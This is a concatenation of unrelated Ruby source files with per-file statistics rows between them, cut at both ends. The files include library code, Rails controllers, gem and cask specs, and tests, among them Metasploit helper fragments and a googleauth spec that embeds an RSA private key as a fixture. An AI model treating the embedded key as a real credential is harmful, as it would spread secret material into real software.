it "returns the cookbook paths provided" do
FoodCritic::Review.new(['example'], [], false).cookbook_paths.must_equal ['example']
end
it "returns the cookbook paths provided when there are multiple" do
FoodCritic::Review.new(['example', 'example2'], [], false).cookbook_paths.must_equal ['example', 'example2']
end
end
describe "#warnings" do
it "returns empty when there are no warnings" do
FoodCritic::Review.new('example', [], false).warnings.must_be_empty
end
it "makes the warnings available" do
warning = 'Danger Will Robinson'
FoodCritic::Review.new('example', [warning], false).warnings.must_equal [warning]
end
end
end
| 35.64 | 114 | 0.694725 |
3809cd675ba0a1a26b089b733d008e5da9c78a61 | 1,311 | require "language/node"
class GulpCli < Formula
desc "Command-line utility for Gulp"
homepage "https://github.com/gulpjs/gulp-cli"
url "https://registry.npmjs.org/gulp-cli/-/gulp-cli-2.3.0.tgz"
sha256 "0a5a76e5be9856edf019fb5be0ed8501a8d815da1beeb9c6effca07a93873ba4"
license "MIT"
livecheck do
url :stable
end
bottle do
cellar :any_skip_relocation
sha256 "231b635ddf8a704a3be4a6ba34611248ece69ed1de04fb82adfa6a20ac83fddb" => :catalina
sha256 "29ec2f9cf132be84c577ff6d6ea02845ee96d995e1affdea8961903f9fec616a" => :mojave
sha256 "e4d363c9d5035fc814ca6a6820b9c8c35a320cd507067cad5eb0c0e6c337c36e" => :high_sierra
end
depends_on "node"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
end
test do
system "npm", "init", "-y"
system "npm", "install", *Language::Node.local_npm_install_args, "gulp"
output = shell_output("#{bin}/gulp --version")
assert_match "CLI version: #{version}", output
assert_match "Local version: ", output
(testpath/"gulpfile.js").write <<~EOS
function defaultTask(cb) {
cb();
}
exports.default = defaultTask
EOS
assert_match "Finished 'default' after ", shell_output("#{bin}/gulp")
end
end
| 29.133333 | 93 | 0.715484 |
2124849dc5c18f9493bbeeca935a51674af59b43 | 3,217 | module TZInfo
# A proxy class standing in for a {Timezone} with a given identifier.
# {TimezoneProxy} inherits from {Timezone} and can be treated identically to
# {Timezone} instances loaded with {Timezone.get}.
#
# {TimezoneProxy} instances are used to avoid the performance overhead of
# loading time zone data into memory, for example, by {Timezone.all}.
#
# The first time an attempt is made to access the data for the time zone, the
  # real {Timezone} will be loaded. If the proxy's identifier was not
# valid, then an exception will be raised at this point.
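  #
  # A usage sketch (illustrative; the identifier below is an assumption):
  #
  #     proxy = TimezoneProxy.new('Europe/London') # no data is loaded yet
  #     proxy.identifier                           # returns the stored identifier
  #     proxy.canonical_zone                       # first real access loads the Timezone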
class TimezoneProxy < Timezone
# Initializes a new {TimezoneProxy}.
#
# The `identifier` parameter is not checked when initializing the proxy. It
# will be validated when the real {Timezone} instance is loaded.
#
# @param identifier [String] an IANA Time Zone Database time zone
# identifier.
def initialize(identifier)
super()
@identifier = identifier
@real_timezone = nil
end
# (see Timezone#identifier)
def identifier
@real_timezone ? @real_timezone.identifier : @identifier
end
# (see Timezone#period_for)
def period_for(time)
real_timezone.period_for_utc(time)
end
# (see Timezone#periods_for_local)
def periods_for_local(local_time)
real_timezone.periods_for_local(local_time)
end
# (see Timezone#transitions_up_to)
def transitions_up_to(to, from = nil)
real_timezone.transitions_up_to(to, from)
end
# (see Timezone#canonical_zone)
def canonical_zone
real_timezone.canonical_zone
end
# Returns a serialized representation of this {TimezoneProxy}. This method
# is called when using `Marshal.dump` with an instance of {TimezoneProxy}.
#
    # @param limit [Integer] the maximum depth to dump - ignored.
    # @return [String] a serialized representation of this {TimezoneProxy}.
def _dump(limit)
identifier
end
# Loads a {TimezoneProxy} from the serialized representation returned by
# {_dump}. This is method is called when using `Marshal.load` or
# `Marshal.restore` to restore a serialized {Timezone}.
#
# @param data [String] a serialized representation of a {TimezoneProxy}.
# @return [TimezoneProxy] the result of converting `data` back into a
# {TimezoneProxy}.
def self._load(data)
TimezoneProxy.new(data)
end
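    # An illustrative Marshal round trip through {_dump} and {_load} (the
    # identifier is an assumed example):
    #
    #   proxy = TimezoneProxy.new('UTC')
    #   data = Marshal.dump(proxy)       # serializes only the identifier
    #   Marshal.load(data).identifier    # => 'UTC', restored as a new proxy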
private
# Returns the real {Timezone} instance being proxied.
#
# The real {Timezone} is loaded using {Timezone.get} on the first access.
#
# @return [Timezone] the real {Timezone} instance being proxied.
def real_timezone
# Thread-safety: It is possible that the value of @real_timezone may be
# calculated multiple times in concurrently executing threads. It is not
# worth the overhead of locking to ensure that @real_timezone is only
# calculated once.
unless @real_timezone
result = Timezone.get(@identifier)
return result if frozen?
@real_timezone = result
end
@real_timezone
end
end
end
| 33.863158 | 79 | 0.692882 |
1d0d203b51dd48a53ea35bc783e74db29dc1bab5 | 1,306 | module Msf
module Util
module DotNetDeserialization
module Assemblies
# see:
# * https://docs.microsoft.com/en-us/dotnet/standard/assembly/
# * https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/versions-and-dependencies
# * https://docs.microsoft.com/en-us/dotnet/standard/assembly/reference-strong-named
class StrongName
def initialize(name, version, public_key_token, culture: 'neutral')
@name = name
@version = version
@public_key_token = public_key_token
@culture = culture
end
attr_reader :name, :version, :public_key_token, :culture
def to_s
"#{name}, Version=#{version}, Culture=#{culture}, PublicKeyToken=#{public_key_token}"
end
def [](type_name)
QualifiedName.new(type_name, self)
end
end
# see: https://docs.microsoft.com/en-us/dotnet/api/system.type.assemblyqualifiedname
class QualifiedName
def initialize(name, assembly)
@name = name
@assembly = assembly
end
attr_reader :name, :assembly
def to_s
"#{name}, #{assembly}"
end
end
VERSIONS = {
'4.0.0.0' => {
'mscorlib' => StrongName.new('mscorlib', '4.0.0.0', 'b77a5c561934e089'),
'System' => StrongName.new('System', '4.0.0.0', 'b77a5c561934e089')
}
}
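  # Illustrative lookup built from the classes and table above (the type name
  # 'System.String' is an assumed example):
  #
  #   Assemblies::VERSIONS['4.0.0.0']['mscorlib']['System.String'].to_s
  #   # => "System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"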
end
end
end
end
| 24.185185 | 99 | 0.661562 |
7a6f020ca23b2e60be39fe3ca6a9e8753755823d | 11,792 | require 'core_extensions/string/permit'
class ApplicationController < ActionController::Base
String.include CoreExtensions::String::Permit
include VerifyProfileConcern
include LocaleHelper
include VerifySpAttributesConcern
include EffectiveUser
FLASH_KEYS = %w[error info success warning other].freeze
FLASH_KEY_MAP = { 'notice' => 'info', 'alert' => 'error' }.freeze
# Prevent CSRF attacks by raising an exception.
# For APIs, you may want to use :null_session instead.
protect_from_forgery with: :exception
rescue_from ActionController::InvalidAuthenticityToken, with: :invalid_auth_token
rescue_from ActionController::UnknownFormat, with: :render_not_found
[
ActiveRecord::ConnectionTimeoutError,
PG::ConnectionBad, # raised when a Postgres connection times out
Rack::Timeout::RequestTimeoutException,
Redis::BaseConnectionError,
].each do |error|
rescue_from error, with: :render_timeout
end
helper_method :decorated_session, :reauthn?, :user_fully_authenticated?
prepend_before_action :add_new_relic_trace_attributes
prepend_before_action :session_expires_at
prepend_before_action :set_locale
before_action :disable_caching
before_action :cache_issuer_in_cookie
def session_expires_at
now = Time.zone.now
session[:session_expires_at] = now + Devise.timeout_in
session[:pinged_at] ||= now
redirect_on_timeout
end
# for lograge
def append_info_to_payload(payload)
payload[:user_id] = analytics_user.uuid unless @skip_session_load
end
attr_writer :analytics
def analytics
@analytics ||=
Analytics.new(user: analytics_user, request: request, sp: current_sp&.issuer, ahoy: ahoy)
end
def analytics_user
effective_user || AnonymousUser.new
end
def user_event_creator
@user_event_creator ||= UserEventCreator.new(request: request, current_user: current_user)
end
delegate :create_user_event, :create_user_event_with_disavowal, to: :user_event_creator
delegate :remember_device_default, to: :decorated_session
def decorated_session
@_decorated_session ||= DecoratedSession.new(
sp: current_sp,
view_context: view_context,
sp_session: sp_session,
service_provider_request: service_provider_request,
).call
end
def default_url_options
{ locale: locale_url_param, host: IdentityConfig.store.domain_name }
end
def sign_out(*args)
request.cookie_jar.delete('ahoy_visit')
super
end
def context
user_session[:context] || UserSessionContext::DEFAULT_CONTEXT
end
private
# These attributes show up in New Relic traces for all requests.
# https://docs.newrelic.com/docs/agents/manage-apm-agents/agent-data/collect-custom-attributes
def add_new_relic_trace_attributes
::NewRelic::Agent.add_custom_attributes(amzn_trace_id: amzn_trace_id)
end
def amzn_trace_id
request.headers['X-Amzn-Trace-Id']
end
def disable_caching
response.headers['Cache-Control'] = 'no-store'
response.headers['Pragma'] = 'no-cache'
end
def cache_issuer_in_cookie
cookies[:sp_issuer] = if current_sp.nil?
nil
else
{
value: current_sp.issuer,
expires: IdentityConfig.store.session_timeout_in_minutes.minutes,
}
end
end
def redirect_on_timeout
return unless params[:timeout]
unless current_user
flash[:info] = t(
'notices.session_cleared',
minutes: IdentityConfig.store.session_timeout_in_minutes,
)
end
begin
redirect_to url_for(permitted_timeout_params)
rescue ActionController::UrlGenerationError # binary data in params cause redirect to throw this
head :bad_request
end
end
def permitted_timeout_params
params.permit(:request_id)
end
def current_sp
@current_sp ||= sp_from_sp_session || sp_from_request_id || sp_from_request_issuer_logout
end
def sp_from_sp_session
sp = ServiceProvider.from_issuer(sp_session[:issuer])
sp if sp.is_a? ServiceProvider
end
def sp_from_request_id
sp = ServiceProvider.from_issuer(service_provider_request.issuer)
sp if sp.is_a? ServiceProvider
end
def sp_from_request_issuer_logout
return if action_name != 'logout'
issuer_sp = ServiceProvider.from_issuer(saml_request&.service_provider&.identifier)
issuer_sp if issuer_sp.is_a? ServiceProvider
end
def service_provider_request
@service_provider_request ||= ServiceProviderRequestProxy.from_uuid(params[:request_id])
end
def add_piv_cac_setup_url
session[:needs_to_setup_piv_cac_after_sign_in] ? login_add_piv_cac_prompt_url : nil
end
def service_provider_mfa_setup_url
service_provider_mfa_policy.user_needs_sp_auth_method_setup? ? two_factor_options_url : nil
end
def after_sign_in_path_for(_user)
service_provider_mfa_setup_url || add_piv_cac_setup_url ||
user_session.delete(:stored_location) || sp_session_request_url_without_prompt_login ||
signed_in_url
end
def signed_in_url
user_fully_authenticated? ? account_or_verify_profile_url : user_two_factor_authentication_url
end
def after_mfa_setup_path
if needs_completions_screen?
sign_up_completed_url
elsif user_needs_to_reactivate_account?
reactivate_account_url
else
session[:account_redirect_path] || after_sign_in_path_for(current_user)
end
end
def user_needs_to_reactivate_account?
return false if current_user.decorate.password_reset_profile.blank?
sp_session[:ial2] == true
end
def reauthn_param
params[:reauthn]
end
def invalid_auth_token(_exception)
controller_info = "#{controller_path}##{action_name}"
analytics.track_event(
Analytics::INVALID_AUTHENTICITY_TOKEN,
controller: controller_info,
user_signed_in: user_signed_in?,
)
flash[:error] = t('errors.invalid_authenticity_token')
redirect_back fallback_location: new_user_session_url
end
def user_fully_authenticated?
!reauthn? && user_signed_in? &&
two_factor_enabled? &&
session['warden.user.user.session'] &&
!session['warden.user.user.session'].try(
:[],
TwoFactorAuthenticatable::NEED_AUTHENTICATION,
)
end
def reauthn?
reauthn = reauthn_param
reauthn.present? && reauthn == 'true'
end
def confirm_two_factor_authenticated(id = nil)
return prompt_to_sign_in_with_request_id(id) if user_needs_new_session_with_request_id?(id)
authenticate_user!(force: true)
return prompt_to_setup_mfa unless two_factor_enabled?
return prompt_to_verify_mfa unless user_fully_authenticated?
return prompt_to_setup_mfa if service_provider_mfa_policy.
user_needs_sp_auth_method_setup?
return prompt_to_verify_sp_required_mfa if service_provider_mfa_policy.
user_needs_sp_auth_method_verification?
enforce_total_session_duration_timeout
true
end
def enforce_total_session_duration_timeout
return sign_out_with_timeout_error if session_total_duration_expired?
ensure_user_session_has_created_at
end
def sign_out_with_timeout_error
analytics.track_event(Analytics::SESSION_TOTAL_DURATION_TIMEOUT)
sign_out
flash[:info] = t('devise.failure.timeout')
redirect_to root_url
end
def ensure_user_session_has_created_at
return if user_session.nil? || user_session[:created_at].present?
user_session[:created_at] = Time.zone.now
end
def session_total_duration_expired?
session_created_at = user_session&.dig(:created_at)
return if session_created_at.blank?
session_created_at = Time.zone.parse(session_created_at.to_s)
timeout_in_minutes = IdentityConfig.store.session_total_duration_timeout_in_minutes.minutes
(session_created_at + timeout_in_minutes) < Time.zone.now
end
def prompt_to_sign_in_with_request_id(request_id)
redirect_to new_user_session_url(request_id: request_id)
end
def prompt_to_setup_mfa
redirect_to two_factor_options_url
end
def prompt_to_verify_mfa
redirect_to user_two_factor_authentication_url
end
def prompt_to_verify_sp_required_mfa
redirect_to sp_required_mfa_verification_url
end
def sp_required_mfa_verification_url
return login_two_factor_piv_cac_url if service_provider_mfa_policy.piv_cac_required?
if TwoFactorAuthentication::PivCacPolicy.new(current_user).enabled? && !mobile?
login_two_factor_piv_cac_url
elsif TwoFactorAuthentication::WebauthnPolicy.new(current_user).enabled?
login_two_factor_webauthn_url
else
login_two_factor_piv_cac_url
end
end
def user_needs_new_session_with_request_id?(id)
!user_signed_in? && id.present?
end
def two_factor_enabled?
MfaPolicy.new(current_user).two_factor_enabled?
end
def skip_session_expiration
@skip_session_expiration = true
end
def skip_session_load
@skip_session_load = true
end
def set_locale
I18n.locale = LocaleChooser.new(params[:locale], request).locale
end
def sp_session_ial
sp_session[:ial].presence || 1
end
def increment_monthly_auth_count
return unless current_user&.id
issuer = sp_session[:issuer]
return if issuer.blank? || !first_auth_of_session?(issuer, sp_session_ial)
MonthlySpAuthCount.increment(current_user.id, issuer, sp_session_ial)
end
def first_auth_of_session?(issuer, ial)
auth_sp_token = "auth_counted_#{issuer}"
auth_sp_token.concat('ial1') if ial == 1
authenticated_to_sp = user_session[auth_sp_token]
return if authenticated_to_sp
user_session[auth_sp_token] = true
end
def mfa_policy
@mfa_policy ||= MfaPolicy.new(current_user)
end
def service_provider_mfa_policy
@service_provider_mfa_policy ||= ServiceProviderMfaPolicy.new(
user: current_user,
service_provider: sp_from_sp_session,
auth_method: user_session[:auth_method],
aal_level_requested: sp_session[:aal_level_requested],
piv_cac_requested: sp_session[:piv_cac_requested],
)
end
def sp_session
session.fetch(:sp, {})
end
def sp_session_request_url_without_prompt_login
    # login.gov redirects to the original request_url after a user authenticates.
    # Replace prompt=login with prompt=select_account to prevent sign_out,
    # which should only ever occur once, when the user lands on login.gov with prompt=login.
url = sp_session[:request_url]
url ? url.gsub('prompt=login', 'prompt=select_account') : nil
end
def render_not_found
render template: 'pages/page_not_found', layout: false, status: :not_found, formats: :html
end
def render_timeout(exception)
analytics.track_event(Analytics::RESPONSE_TIMED_OUT, analytics_exception_info(exception))
if exception.class == Rack::Timeout::RequestTimeoutException
NewRelic::Agent.notice_error(exception)
end
render template: 'pages/page_took_too_long',
layout: false, status: :service_unavailable, formats: :html
end
def render_full_width(template, **opts)
render template, **opts, layout: 'base'
end
def analytics_exception_info(exception)
{
backtrace: Rails.backtrace_cleaner.send(:filter, exception.backtrace),
exception_message: exception.to_s,
exception_class: exception.class.name,
}
end
def add_sp_cost(token)
Db::SpCost::AddSpCost.call(
sp_session[:issuer].to_s,
sp_session_ial,
token,
transaction_id: nil,
user_id: current_user.id,
)
end
def mobile?
client = DeviceDetector.new(request.user_agent)
client.device_type != 'desktop'
end
end
| 30.005089 | 100 | 0.745166 |
018e5e1d74fff8e9192b79e821b0409e159951c5 | 1,171 | # -*- encoding: utf-8 -*-
$:.push File.expand_path('../lib', __FILE__)
require 'redis-rails/version'
Gem::Specification.new do |s|
s.name = 'redis-rails'
s.version = Redis::Rails::VERSION
s.authors = ['Luca Guidi', 'Ryan Bigg']
s.email = ['[email protected]', '[email protected]']
s.homepage = 'http://redis-store.org/redis-rails'
s.summary = %q{Redis for Ruby on Rails}
s.description = %q{Redis for Ruby on Rails}
s.license = 'MIT'
s.rubyforge_project = 'redis-rails'
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
s.require_paths = ['lib']
s.add_dependency 'redis-store', '~> 1.1.0'
s.add_dependency 'redis-activesupport', '~> 4'
s.add_dependency 'redis-actionpack', '~> 4'
s.add_development_dependency 'rake', '~> 10'
s.add_development_dependency 'bundler', '~> 1.3'
s.add_development_dependency 'mocha', '~> 0.14.0'
s.add_development_dependency 'minitest', '~> 4.2'
s.add_development_dependency 'redis-store-testing'
end
| 36.59375 | 83 | 0.625961 |
87f71222d832197e0b4e5515f0858a81b702e777 | 1,029 | class ConsolidatedBagpipesMigration < ActiveRecord::Migration
def self.up
create_table :members do |t|
t.string :name
t.boolean :administrator, :default => false
t.datetime :created_at
t.datetime :updated_at
t.integer :user_id, :null => false
t.string :user_type, :null => false
end
create_table :messages do |t|
t.integer :topic_id
t.integer :parent_id
t.string :title
t.text :content
t.datetime :created_at
t.datetime :updated_at
t.integer :member_id
end
add_index :messages, [:topic_id], :name => :index_messages_on_topic_id
add_index :messages, [:parent_id], :name => :index_messages_on_parent_id
create_table :topics do |t|
t.string :title
t.text :description
t.datetime :created_at
t.datetime :updated_at
end
end
def self.down
drop_table :messages
drop_table :members
drop_table :topics
end
end | 27.078947 | 76 | 0.613217 |
010e2810f19facaa378c1c95f59a39d65b5dbe70 | 123 | RSpec.describe Msf::Exploit::SQLi::MySQLi::TimeBasedBlind do
it_should_behave_like 'TimeBasedBlind', described_class
end
| 30.75 | 60 | 0.829268 |
b9e1df9a31a461806b51256ebcb425d37517dc0f | 4,094 | require 'spec_helper'
require 'trice_controller_method_test_controller'
describe 'TriceControllerMethodTestController E2E', type: :request do
scenario 'hi' do
get '/bang'
expect(response.status).to eq 400
end
end
if defined?(ActionController::API)
describe 'TriceApiControllerMethodTestController E2E', type: :request do
scenario 'hi' do
get '/api/bang'
expect(response.status).to eq 400
end
end
end
shared_examples 'trice controller methods' do
  describe '#requested_at should be the same time' do
before do
get :hi
end
specify { expect(assigns(:requested_at_x)).to be_acts_like(:time) }
specify { expect(assigns(:requested_at_x)).to be assigns(:requested_at_y) }
end
describe 'request stubbing' do
let(:time) { Time.zone.parse('2016-02-01 00:00:00') }
context 'stubbed by query' do
before do
if Rails.gem_version >= Gem::Version.new('5.0.0')
get :hi, params: { '_requested_at' => time.strftime('%Y%m%d%H%M%S') }
else
get :hi, '_requested_at' => time.strftime('%Y%m%d%H%M%S')
end
end
specify { expect(assigns(:requested_at_x)).to eq time }
end
context 'stubbed by header' do
before do
request.headers['X-Requested-At'] = time.iso8601
get :hi
end
specify { expect(assigns(:requested_at_x)).to eq time }
end
    context 'StubConfiguration#stubbable? is not evaluated without a stub param or header' do
before do
expect_any_instance_of(Trice::ControllerMethods::StubConfiguration).not_to receive(:stubbable?)
get :hi
end
specify { expect(assigns(:requested_at_x)).to be_acts_like(:time) }
end
context 'stubbed by helper method (static)' do
t = Time.now
stub_requested_at t
before do
get :hi
end
specify { expect(assigns(:requested_at_x)).to eq Time.at(t.to_i).utc }
end
context 'stubbed by helper method (block)' do
let(:time) { Time.zone.parse('2016-02-01 00:00:00') }
stub_requested_at { time }
before do
get :hi
end
specify { expect(assigns(:requested_at_x)).to eq time }
end
context 'stubbed by both' do
let(:time) { Time.zone.parse('2016-02-01 00:00:00') }
before do
request.headers['X-Requested-At'] = 1.day.ago(time).iso8601
if Rails.gem_version >= Gem::Version.new('5.0.0')
get :hi, params: { '_requested_at' => time.strftime('%Y%m%d%H%M%S') }
else
get :hi, '_requested_at' => time.strftime('%Y%m%d%H%M%S')
end
end
specify 'prefers query params' do
expect(assigns(:requested_at_x)).to eq time
end
end
end
end
describe TriceControllerMethodTestController, type: :controller do
it_behaves_like 'trice controller methods'
end
if defined?(ActionController::API)
describe TriceApiControllerMethodTestController, type: :controller do
it_behaves_like 'trice controller methods'
end
end
describe 'stub_requested_at helper for feature spec', type: :feature do
let(:time) { Time.zone.parse('2016-02-01 00:00:00') }
stub_requested_at { time }
def with_driver(driver, &block)
saved = Capybara.current_driver
Capybara.current_driver = driver
block.call
ensure
Capybara.current_driver = saved
end
context 'with rack_test driver' do
around do |example|
with_driver(:rack_test) do
example.run
end
end
scenario do
visit '/hi'
expect(Time.zone.parse(JSON.parse(page.body)['requested_at_x'])).to eq(time)
end
end
context 'with poltergeist driver' do
around do |example|
with_driver(:poltergeist) do
example.run
end
end
scenario do
visit '/hi'
# XXX: poltergeist returns `<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">{"requested_at_x":"2016-02-01T00:00:00.000Z","requested_at_y":"2016-02-01T00:00:00.000Z"}</pre></body></html>`
expect(page.body).to include(time.to_json)
end
end
end
| 26.24359 | 228 | 0.65022 |
ffcf9b72701237b0b682741d3bf6586fa95a60bb | 76 | class Photo < ActiveRecord::Base
mount_uploader :image, ImageUploader
end
| 19 | 38 | 0.802632 |
4a0ed2da210a0e2a2eb159784de32a0901cba088 | 1,173 | Pod::Spec.new do |s|
s.name = "Horadric"
s.version = "0.0.5"
s.summary = "Combine your development skills to build something great"
s.description = <<-DESC
A longer description of Horadric in Markdown format.
* Think: Why did you write this? What is the focus? What does it do?
* CocoaPods will be using this to generate tags, and improve search results.
* Try to keep it short, snappy and to the point.
* Finally, don't worry about the indent, CocoaPods strips it!
DESC
s.homepage = "http://www.prismatik.com.au"
s.license = { type: "MIT", file: "LICENSE" }
s.author = { "Jack Dean Watson-Hamblin" => "[email protected]" }
s.social_media_url = "http://twitter.com/FluffyJack"
s.platform = :ios
s.platform = :ios, "8.0"
s.source = { :git => "https://github.com/FluffyJack/Horadric.git", :tag => s.version }
s.source_files = "Horadric/**/*.{swift}"
s.exclude_files = "Horadric/Exclude", "Horadric/HoradricTests"
s.framework = "WebKit"
s.requires_arc = true
end
| 35.545455 | 95 | 0.584825 |
bf85c6ddebb4d820a2a06af4ef48717d7f5e3051 | 744 | cask "canva" do
version "1.14.0"
sha256 "04595dce762c2613efc28fdc0f8a15ca78149e912ceef4724f6eadec697a530b"
url "https://desktop-release.canva-deploy.com/Canva-#{version}.dmg",
verified: "desktop-release.canva-deploy.com/"
appcast "https://desktop-release.canva-deploy.com/latest-mac.yml"
name "Canva"
desc "Design tool"
homepage "https://www.canva.com/"
auto_updates true
app "Canva.app"
zap trash: [
"~/Library/Application Support/Canva",
"~/Library/Caches/com.canva.CanvaDesktop",
"~/Library/Caches/com.canva.CanvaDesktop.ShipIt",
"~/Library/Logs/Canva",
"~/Library/Preferences/com.canva.CanvaDesktop.plist",
"~/Library/Saved Application State/com.canva.CanvaDesktop.savedState",
]
end
| 29.76 | 75 | 0.719086 |
1d512e5492090036dac21b3dec0099bfdfe17ab3 | 332 | module Ipaymu
class SignatureService
attr_reader :key
def initialize(key, digest=Ipaymu::SHA256Digest)
@key = key
@digest = digest
end
def sign(data)
str_to_sign = DataSign.signature(data)
hash(str_to_sign)
end
def hash(data)
@digest.hexdigest(@key, data)
end
end
end | 17.473684 | 52 | 0.635542 |
abed8216f45e056e2cc712b8de6132833402566f | 1,251 | module Rules
##
# Tests that all GitHub email addresses match the
# {GithubConnector::Settings#rule_email_regex} setting. If
# no `rule_email_regex` setting exists, this rule always
# returns `true`.
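  #
  # For example (the setting value below is an assumption, not from this file):
  # with `rule_email_regex` set to `'@example\.com\z'`, a user whose addresses
  # are all at example.com passes, while any other address fails and is listed
  # by {#error_msg}.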
class Email < Base
# Returns true if this rule is enabled.
#
# @return [Boolean]
def self.enabled?
!!settings.rule_email_regex
end
# A descriptive error message to display when this rule
# fails.
#
# @return [String]
def error_msg
return nil if result
bad_emails = email_addresses.reject { |email| regex.match(email) }
"#{bad_emails.count == 1 ? 'Email does' : 'Emails do'} not meet criteria: #{bad_emails.join(', ')}"
end
    # This rule is not required for external users.
#
# @return [Boolean] false
def required_for_external?
false
end
# The result of applying this rule to the {GithubUser}.
# @return [Boolean] `true` if the rule passes, false otherwise
def result
email_addresses.all? { |email| regex.match(email) }
end
private
def email_addresses
github_user.emails.map { |email| email.address.downcase }
end
def regex
@regex ||= Regexp.new(settings.rule_email_regex)
end
end
end
| 24.057692 | 105 | 0.647482 |
91e1e924f1661314007a7b397b46818e0ad7a0e2 | 224 | require 'rails_helper'
RSpec.describe Steps::Abduction::RiskDetailsController, type: :controller do
it_behaves_like 'an intermediate step controller', Steps::Abduction::RiskDetailsForm, C100App::AbductionDecisionTree
end
| 37.333333 | 118 | 0.830357 |
ff50f4210d6d6be3439710ca581887133d7c0860 | 28,889 | # Copyright 2015 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "googleauth"
# This test is testing the private class Google::Auth::Credentials. We want to
# make sure that the passed-in scope propagates to the Signet object. This means
# testing the private API, which is generally frowned on.
describe Google::Auth::Credentials, :private do
let(:token) { "1/abcdef1234567890" }
let :default_keyfile_hash do
{
"private_key_id" => "testabc1234567890xyz",
"private_key" => "-----BEGIN RSA PRIVATE KEY-----\nMIIBOwIBAAJBAOyi0Hy1l4Ym2m2o71Q0TF4O9E81isZEsX0bb+Bqz1SXEaSxLiXM\nUZE8wu0eEXivXuZg6QVCW/5l+f2+9UPrdNUCAwEAAQJAJkqubA/Chj3RSL92guy3\nktzeodarLyw8gF8pOmpuRGSiEo/OLTeRUMKKD1/kX4f9sxf3qDhB4e7dulXR1co/\nIQIhAPx8kMW4XTTL6lJYd2K5GrH8uBMp8qL5ya3/XHrBgw3dAiEA7+3Iw3ULTn2I\n1J34WlJ2D5fbzMzB4FAHUNEV7Ys3f1kCIQDtUahCMChrl7+H5t9QS+xrn77lRGhs\nB50pjvy95WXpgQIhAI2joW6JzTfz8fAapb+kiJ/h9Vcs1ZN3iyoRlNFb61JZAiA8\nNy5NyNrMVwtB/lfJf1dAK/p/Bwd8LZLtgM6PapRfgw==\n-----END RSA PRIVATE KEY-----\n",
"client_email" => "[email protected]",
"client_id" => "credz-testabc1234567890xyz.apps.googleusercontent.com",
"type" => "service_account",
"project_id" => "a_project_id",
"quota_project_id" => "b_project_id"
}
end
def mock_signet
mocked_signet = double "Signet::OAuth2::Client"
allow(mocked_signet).to receive(:configure_connection).and_return(mocked_signet)
allow(mocked_signet).to receive(:needs_access_token?).and_return(true)
allow(mocked_signet).to receive(:fetch_access_token!).and_return(true)
allow(mocked_signet).to receive(:client_id)
allow(Signet::OAuth2::Client).to receive(:new) do |options|
yield options if block_given?
mocked_signet
end
mocked_signet
end
it "uses a default scope" do
mock_signet do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq([])
expect(options[:issuer]).to eq(default_keyfile_hash["client_email"])
expect(options[:signing_key]).to be_a_kind_of(OpenSSL::PKey::RSA)
end
Google::Auth::Credentials.new default_keyfile_hash
end
it "uses a custom scope" do
mock_signet do |options|
expect(options[:token_credential_uri]).to eq("https://oauth2.googleapis.com/token")
expect(options[:audience]).to eq("https://oauth2.googleapis.com/token")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:issuer]).to eq(default_keyfile_hash["client_email"])
expect(options[:signing_key]).to be_a_kind_of(OpenSSL::PKey::RSA)
end
Google::Auth::Credentials.new default_keyfile_hash, scope: "http://example.com/scope"
end
it "uses empty paths and env_vars by default" do
expect(Google::Auth::Credentials.paths).to eq([])
expect(Google::Auth::Credentials.env_vars).to eq([])
end
describe "using CONSTANTS" do
it "can be subclassed to pass in other env paths" do
test_path_env_val = "/unknown/path/to/file.txt".freeze
test_json_env_val = JSON.generate default_keyfile_hash
ENV["TEST_PATH"] = test_path_env_val
ENV["TEST_JSON_VARS"] = test_json_env_val
class TestCredentials1 < Google::Auth::Credentials
TOKEN_CREDENTIAL_URI = "https://example.com/token".freeze
AUDIENCE = "https://example.com/audience".freeze
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = ["TEST_PATH"].freeze
JSON_ENV_VARS = ["TEST_JSON_VARS"].freeze
end
allow(::File).to receive(:file?).with(test_path_env_val) { false }
allow(::File).to receive(:file?).with(test_json_env_val) { false }
mocked_signet = mock_signet
allow(Google::Auth::ServiceAccountCredentials).to receive(:make_creds) do |options|
expect(options[:token_credential_uri]).to eq("https://example.com/token")
expect(options[:audience]).to eq("https://example.com/audience")
expect(options[:scope]).to eq(["http://example.com/scope"])
expect(options[:enable_self_signed_jwt]).to eq(true)
expect(options[:target_audience]).to be_nil
expect(options[:json_key_io].read).to eq(test_json_env_val)
# This should really be a Signet::OAuth2::Client object,
# but mocking is making that difficult, so return a valid hash instead.
default_keyfile_hash
end
creds = TestCredentials1.default enable_self_signed_jwt: true
expect(creds).to be_a_kind_of(TestCredentials1)
expect(creds.client).to eq(mocked_signet)
expect(creds.project_id).to eq(default_keyfile_hash["project_id"])
expect(creds.quota_project_id).to eq(default_keyfile_hash["quota_project_id"])
end
it "subclasses can use PATH_ENV_VARS to get keyfile path" do
class TestCredentials2 < Google::Auth::Credentials
SCOPE = "http://example.com/scope".freeze
PATH_ENV_VARS = %w[PATH_ENV_DUMMY PATH_ENV_TEST].freeze
JSON_ENV_VARS = ["JSON_ENV_DUMMY"].freeze
DEFAULT_PATHS = ["~/default/path/to/file.txt"].freeze
end
json_content = JSON.generate default_keyfile_hash
allow(::ENV).to receive(:[]).with("GOOGLE_AUTH_SUPPRESS_CREDENTIALS_WARNINGS") { "true" }
allow(::ENV).to receive(:[]).with("PATH_ENV_DUMMY") { "/fake/path/to/file.txt" }
allow(::File).to receive(:file?).with("/fake/path/to/file.txt") { false }
allow(::ENV).to receive(:[]).with("PATH_ENV_TEST") { "/unknown/path/to/file.txt" }
